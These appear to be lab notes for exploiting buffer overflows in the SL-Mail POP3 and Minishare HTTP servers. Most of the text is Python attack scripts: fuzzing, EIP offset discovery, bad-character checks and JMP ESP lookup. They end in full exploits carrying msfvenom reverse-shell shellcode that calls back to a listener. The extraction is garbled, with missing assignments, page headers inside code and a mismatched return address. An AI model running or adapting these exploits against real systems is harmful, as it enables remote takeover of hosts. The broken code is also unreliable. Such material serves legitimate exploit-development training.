At each stage exit the service and exit Immunity debugger
Reload application and reload Immunity debugger
Attach Immunity Debugger to the service
Step 1 - Check you can connect to the service
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending Evil Buffer..."
s.connect(('192.168.56.101',110))
s.send('User test' +'\r\n')
s.send('PASS test' + '\r\n')
print "Could not connect to POP3!"
Buffer Overflow - SL-Mail
Step 2 - Fuzz the application to cause a crash
buffer.append("A"*counter)
print "Fuzzing PASS with %s bytes" % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.56.101',110))
s.send('PASS ' + string + '\r\n')
Buffer Overflow - SL-Mail
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
Crash happens somewhere around the 2900 mark.
Step 3 - Ensure the expected fuzz causes a crash.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Buffer Overflow - SL-Mail
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
Should crash the server overwriting with 41414141
Step 4 - Locate EIP overwrite length/ offset.
Create a pattern at the 2700 mark and insert it into python script as buffer.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
Buffer Overflow - SL-Mail
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
Note the EIP value 39694438 in Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
Step 5 - Overwrite EIP with 4 x b (x42)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*90
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
Buffer Overflow - SL-Mail
Look for 42424242 at EIP register
Step 6 - Check Buffer Length is long enough to hold reverse shellcode.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
This should work and give you a large amount of space
Rightclick ESP register and follow in dump and check there is lots of space over written with
Step 7 - Check for bad characters
Buffer Overflow - SL-Mail
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x
15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x
35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x
56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x
75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x
95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\x
b5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5
\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\x
f6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "A"*2606 +"B"*4 + badchars
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
Buffer Overflow - SL-Mail
Follow the ESP in dump and check for which characters cause the exploit to crash and is
mising until you have removed them all.
It should read 01 02 03 04 05 -missing- 07 which means x06 is a bad character.
Restart the debugger and the service every time you do this and rerun the script.
Note the bad characters you remove. The final three should read FD FE FF and then they
are all removed and it is not truncated.
In immunity debugger type
Choose a DLL that is FALSE FALSE FALSE FALSE TRUE
If it has no esp move to another
Upload jumpesp.exe to the host and run the following command:
findjmp.exe slmfc.dll esp
Choose a jmp esp from the list
!mona find -s "\xff\xe4" -m slmfc.dll
Buffer Overflow - SL-Mail
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e
x86/shikata_ga_nai -b "\x00\x0a\x0d"
Check x86/shikata_ga_nai encoded or you will have bad chars still in there.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
Buffer Overflow - SL-Mail
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
"\x72\x33\xda\xc4\x73\x16")
buffer = "A"*2606 +"\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
s.send('USER username' +'\r\n')
s.send('PASS ' + buffer + '\r\n')
print "Could not conect to POP3!"
Step 1 - Crash The Service
target_address="192.168.56.101"
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print "Sent! Check the server has crashed"
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l Buffer Overflow - Minishare
target_address="192.168.56.101"
+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A
g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4
Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am
0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1
Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A
s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3
Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A
x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9
Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2
Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5
Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B
h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B
j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1
Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo
3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq
6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B
t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv
5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7
Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C
a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc
3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5
Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg
9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj
4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9
Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print "Sent! Check the server has crashed"
Step 3 - Overwrite EIP with B's
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l #[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q target_address="192.168.56.101"
buffer +="A" * 1787 + "B" * 4 + "C" * (1866-1787-4)
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print "Sent! Check the server has crashed"
Step 4 - Increase Buffer Size to make sure we have room for shellcode
Buffer Overflow - Minishare
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l #[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q #Increase buffer size to see if our shellcode works and has enough space
target_address="192.168.56.101"
buffer +="A" * 1787 + "B" * 4 + "C" * 409
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print "Sent! Check the server has crashed"
Step 5 - Find return Address and remove all bad characters
#!mona find -s "\xff\xe4" -m user32.dll = 0x73429353
See stage 7 from SLMail for finding bad characters.
Buffer Overflow - Minishare
Step 6 - Generate New Reverse Shell
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
"\xd5\xbd\xec\xdb\xd6\x97"
target_address="192.168.56.101"
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
print "Sent! Did you get a shell?"